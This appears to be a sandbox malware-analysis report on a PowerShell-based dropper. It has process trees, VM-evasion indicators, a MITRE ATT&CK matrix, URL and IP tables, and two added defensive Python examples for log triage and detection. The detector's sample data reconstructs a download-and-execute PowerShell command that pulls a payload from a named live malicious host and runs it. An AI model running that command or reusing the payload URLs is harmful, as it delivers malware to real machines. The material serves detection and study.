Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (6 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3925
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3005
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4283
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2344
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8024 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8044 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7868 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8052 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5940 | Thread sleep time: -30000s >= -30000s (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8264 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8300 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7316 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8424 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (6 further occurrences)
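The sleep entries above are easier to triage once the magnitudes are decoded. NT relative timeouts are counted in 100 ns ticks and the report prints the tick count divided by 10 000, so 922337203685477 is Int64.MaxValue (9223372036854775807) scaled that way: the largest possible relative timeout, which is what a wait-until-signalled on a .NET wait handle inside a PowerShell host commonly looks like, not a timed sleep chosen by the sample. The value 1844674407370954 is exactly twice that. The Python below is an added example, not part of the Joe Sandbox report: it parses lines in the shape of this section (the sample lines are constructed to match the report's entries, with the spaces the HTML export dropped between fields put back) and separates these unbounded waits from sleeps that genuinely meet the report's own threshold.

```python
import re
from collections import Counter
from dataclasses import dataclass

# NT relative timeouts are 100 ns ticks; the report prints the tick count
# divided by 10 000, so an Int64.MaxValue timeout appears as 922337203685477.
INT64_MAX_SCALED = (2**63 - 1) // 10_000          # 922337203685477

# Constructed sample lines in the shape of this section's entries, with the
# spaces the HTML export dropped between the fields put back.
SAMPLE_LINES = r"""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8024 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7868 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5940 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8424 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3925
"""

SLEEP_RE = re.compile(
    r"^Source: (?P<image>.+?) TID: (?P<tid>\d+) Thread sleep time: "
    r"(?P<value>-?\d+)s >= (?P<threshold>-?\d+)s$"
)
DELAYED_RE = re.compile(r"Window / User API: threadDelayed (?P<count>\d+)$")


@dataclass
class SleepEvent:
    image: str
    tid: int
    magnitude: int      # absolute value of the reported sleep time
    verdict: str        # "unbounded", "long" or "short"


def classify(value: int, threshold: int) -> str:
    """Decode one reported sleep time.

    unbounded: Int64.MaxValue-sized timeout (or a multiple of it), i.e. a
               wait-until-signalled rather than a timed sleep
    long:      at or beyond the report's own threshold (the ">= -30000s" part)
    short:     everything else
    """
    magnitude = abs(value)
    if magnitude >= INT64_MAX_SCALED:
        return "unbounded"
    if magnitude >= abs(threshold):
        return "long"
    return "short"


def triage(log_text: str) -> list[SleepEvent]:
    """Parse every 'Thread sleep time' line into a classified SleepEvent."""
    events = []
    for line in log_text.splitlines():
        m = SLEEP_RE.match(line.strip())
        if m:
            value, threshold = int(m["value"]), int(m["threshold"])
            events.append(SleepEvent(m["image"], int(m["tid"]), abs(value),
                                     classify(value, threshold)))
    return events


def summarize(log_text: str) -> dict:
    """Verdict counts plus the total of the threadDelayed loop counters."""
    counts = Counter(e.verdict for e in triage(log_text))
    delayed = sum(int(m["count"]) for line in log_text.splitlines()
                  if (m := DELAYED_RE.search(line)))
    return {"unbounded": counts["unbounded"], "long": counts["long"],
            "short": counts["short"], "thread_delayed_total": delayed}


if __name__ == "__main__":
    for e in triage(SAMPLE_LINES):
        name = e.image.split("\\")[-1]
        print(f"{name:<16} TID {e.tid:<5} {e.magnitude:>17}  {e.verdict}")
    print(summarize(SAMPLE_LINES))
```

Run against a full report export, the "unbounded" bucket is the one to discount when deciding whether the long-sleep signature reflects evasion by the sample or just the PowerShell host waiting on a handle; the "long" bucket and the threadDelayed totals are what remain to be judged.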
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: powershell.exe, 00000005.00000002.1665596061.000001FDCB631000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllP
Source: svchost.exe, 00000009.00000002.3010804723.0000028FBB62B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3011359380.0000028FC0A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3011309147.0000028FC0A48000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000010.00000002.1841987741.000002BB1BDAF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 00000010.00000002.1838767470.000002B31A99A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvv
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\alert.pdf"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (5 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (13 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (3 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation (1 occurrence)
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation (6 occurrences)
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation (4 occurrences)
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation (3 occurrences)
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation (1 occurrence)
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation (2 occurrences)
MITRE ATT&CK matrix (a numeric prefix is the report's count badge for a technique its signatures mapped to; cells without a prefix are the matrix's default placeholders, not observations):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 PowerShell | 1 DLL Side-Loading | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 11 Security Software Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 31 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 21 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph ID: 1570132 | Sample: lg1wwLsmCX.exe | Start date: 06/12/2024 | Architecture: WINDOWS | Score: 52

Sample-level nodes: badlarrysguitars.com; x1.i.lencr.org; bg.microsoft.map.fastly.net; signature "Machine Learning detection for sample"; signature "AI detected suspicious sample"

Process tree (numbers after a process name are the graph's per-node counters; see the legend above):
  lg1wwLsmCX.exe (started)
    signature: Suspicious powershell command line found
    powershell.exe 17 20 (started)
      badlarrysguitars.com 101.99.75.174, port 443, source ports 49709, 49806, SHINJIRU-MY-AS-AP (Shinjiru Technology Sdn Bhd, MY), Malaysia
      Acrobat.exe 73 (started)
        AcroCEF.exe 109 (started)
          AcroCEF.exe 6 (started)
            54.224.241.105, port 443, source port 49748, AMAZON-AES, United States
      conhost.exe (started)
    powershell.exe 16 (started)
      conhost.exe (started)
  svchost.exe 1 1 (started)
    127.0.0.1 unknown unknown
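The chain in the graph (an executable on the user's Desktop spawning powershell.exe, which fetches from badlarrysguitars.com and then hands a file in the user's Temp directory to Acrobat) is the download-then-open pattern that endpoint rules for PowerShell web downloads are written to catch. The Python below is an added example, not code from the Joe Sandbox report: it scores Sysmon-style process-creation records for that pattern from the command line and the parent image. The three records are constructed for the example: the first is built from the Invoke-WebRequest / -OutFile (Join-Path fragments and the Temp\alert.pdf launch recorded in this section, the other two are benign and use a placeholder host (example.invalid) that was not observed in the analysis.

```python
import re
from dataclasses import dataclass, field

# Cmdlets, aliases and .NET calls that fetch content from the network.
DOWNLOAD_RE = re.compile(
    r"(?i)\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|wget|curl|Start-BitsTransfer)\b"
    r"|Net\.WebClient|DownloadFile|DownloadString"
)
# The fetched content is written to disk rather than kept in memory.
OUTFILE_RE = re.compile(r"(?i)-OutFile\b|DownloadFile|\bcurl\b.*\s-o\s")
# The destination is a temp directory.
TEMP_RE = re.compile(r"(?i)GetTempPath\(\)|\$env:TEMP\b|\$env:TMP\b|\\Temp\\")
# Something is launched or evaluated after the download.
EXEC_RE = re.compile(r"(?i)\b(Start-Process|Invoke-Item|Invoke-Expression|iex)\b")
# Parent binary lives where an unprivileged user can drop files.
USER_WRITABLE_RE = re.compile(
    r"(?i)\\Users\\[^\\]+\\(Desktop|Downloads|Documents|AppData)\\|\\Temp\\|\\ProgramData\\"
)


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass
class Finding:
    verdict: str                              # "download-and-execute", "web-download" or "none"
    indicators: list[str] = field(default_factory=list)


def is_powershell(image: str) -> bool:
    return image.lower().rsplit("\\", 1)[-1] in ("powershell.exe", "pwsh.exe")


def analyze(event: ProcessEvent) -> Finding:
    """Score one process-creation record for the download-then-open pattern."""
    if not is_powershell(event.image):
        return Finding("none")
    cl = event.command_line
    indicators = []
    if DOWNLOAD_RE.search(cl):
        indicators.append("download_cmdlet")
    if OUTFILE_RE.search(cl):
        indicators.append("writes_payload_to_disk")
    if TEMP_RE.search(cl):
        indicators.append("temp_directory_target")
    if EXEC_RE.search(cl):
        indicators.append("launches_downloaded_content")
    if USER_WRITABLE_RE.search(event.parent_image):
        indicators.append("parent_in_user_writable_path")

    if "download_cmdlet" in indicators and "launches_downloaded_content" in indicators:
        return Finding("download-and-execute", indicators)
    if "download_cmdlet" in indicators:
        return Finding("web-download", indicators)
    return Finding("none", indicators)


# Constructed records (Sysmon event 1 style fields). The first is built from
# the Invoke-WebRequest / -OutFile (Join-Path fragments and the Temp\alert.pdf
# launch recorded in this report; the other two are benign and use a
# placeholder host, not anything observed in the analysis.
SAMPLE_EVENTS = [
    ProcessEvent(
        r"C:\Users\user\Desktop\lg1wwLsmCX.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r'powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" '
        r'-OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); '
        r'Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf")',
    ),
    ProcessEvent(
        r"C:\Windows\explorer.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r"powershell.exe -c Get-ChildItem C:\Windows\Temp",
    ),
    ProcessEvent(
        r"C:\Windows\System32\cmd.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r"powershell.exe -c Invoke-WebRequest -Uri https://example.invalid/tool.zip -OutFile C:\tools\tool.zip",
    ),
]

if __name__ == "__main__":
    for ev, f in zip(SAMPLE_EVENTS, map(analyze, SAMPLE_EVENTS)):
        print(f"{f.verdict:<22} {ev.parent_image} -> {ev.command_line[:60]}")
```

The verdict deliberately separates a plain download (common in admin scripting) from download plus launch in one command line; the parent-path indicator is what distinguishes this sample's chain, started from an unsigned binary on the Desktop, from the same cmdlets typed into a console under explorer.exe or cmd.exe.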

Source | Detection | Scanner | Label
lg1wwLsmCX.exe | 8% | ReversingLabs |
lg1wwLsmCX.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://www.microsoft.co | 0% | Avira URL Cloud | safe
https://badlarrysguitars.com/share/alert.pdf-OutFile(Join-Path( | 0% | Avira URL Cloud | safe
https://badlarrysguitars.comp | 0% | Avira URL Cloud | safe
http://badlarrysguitars.com | 0% | Avira URL Cloud | safe
https://www.adobe.co | 0% | Avira URL Cloud | safe
https://badlarrysguitars.com/private/nois.exe-OutFile(Join-Path( | 0% | Avira URL Cloud | safe
https://badlarrysguitars.com | 0% | Avira URL Cloud | safe
http://crl.micronW | 0% | Avira URL Cloud | safe
https://badlarrysguitars.com/share/alert.pdf | 0% | Avira URL Cloud | safe
https://badlarrysguitars.com/private/nois.exe | 0% | Avira URL Cloud | safe
https://badlarrysguitars.com/pri | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | high
badlarrysguitars.com | 101.99.75.174 | true | true | | unknown
x1.i.lencr.org | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://badlarrysguitars.com/share/alert.pdf | true | Avira URL Cloud: safe | unknown
https://badlarrysguitars.com/private/nois.exe | true | Avira URL Cloud: safe | unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.1661276426.000001FDC3323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1661276426.000001FDC3466000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1646173609.000001FDB4CB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1828727225.000002B3125E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1828727225.000002B312727000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.8.drfalse
            high
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000010.00000002.1781877654.000002B3027A2000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000010.00000002.1781877654.000002B3027A2000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://badlarrysguitars.comppowershell.exe, 00000005.00000002.1646173609.000001FDB4444000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://go.micropowershell.exe, 00000005.00000002.1646173609.000001FDB4444000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1781877654.000002B3036FF000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://www.microsoft.copowershell.exe, 00000005.00000002.1665556842.000001FDCB4E0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://contoso.com/Licensepowershell.exe, 00000010.00000002.1828727225.000002B312727000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://contoso.com/Iconpowershell.exe, 00000010.00000002.1828727225.000002B312727000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://crl.ver)svchost.exe, 00000009.00000002.3011261258.0000028FC0A00000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://badlarrysguitars.com/private/nois.exe-OutFile(Join-Path(powershell.exe, 00000010.00000002.1780240680.000002B300650000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1781632613.000002B3009A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1781527537.000002B300900000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1840770157.000002B31B0F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1780240680.000002B3006E2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1842632807.000002BB1BE2A000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://badlarrysguitars.com/share/alert.pdf-OutFile(Join-Path(powershell.exe, 00000005.00000002.1645720630.000001FDB14C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1645586241.000001FDB13E2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1645545243.000001FDB1370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1665596061.000001FDCB66C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1646033280.000001FDB15D0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://github.com/Pester/Pesterpowershell.exe, 00000010.00000002.1781877654.000002B3027A2000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://crl.micronWpowershell.exe, 00000005.00000002.1665596061.000001FDCB66C000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://badlarrysguitars.compowershell.exe, 00000005.00000002.1646173609.000001FDB4444000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1781877654.000002B3036FF000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          unknown
                          https://www.adobe.coReaderMessages.7.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://badlarrysguitars.compowershell.exe, 00000005.00000002.1646173609.000001FDB4BDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1781877654.000002B303E97000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://badlarrysguitars.com/pripowershell.exe, 00000010.00000002.1781877654.000002B303EC4000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          unknown
                          https://g.live.com/odclientsettings/Prod-C:edb.log.9.dr, qmgr.db.9.drfalse
                            high
                            https://contoso.com/powershell.exe, 00000010.00000002.1828727225.000002B312727000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://g.live.com/odclientsettings/ProdV2-C:svchost.exe, 00000009.00000003.1360100090.0000028FC0C50000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.drfalse
                                high
                                https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.1661276426.000001FDC3323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1661276426.000001FDC3466000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1646173609.000001FDB4CB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1828727225.000002B3125E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1828727225.000002B312727000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://aka.ms/pscore68powershell.exe, 00000005.00000002.1646173609.000001FDB32B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1781877654.000002B302571000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.1646173609.000001FDB32B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1781877654.000002B302571000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
54.224.241.105 | unknown | United States | 14618 | AMAZON-AESUS | false
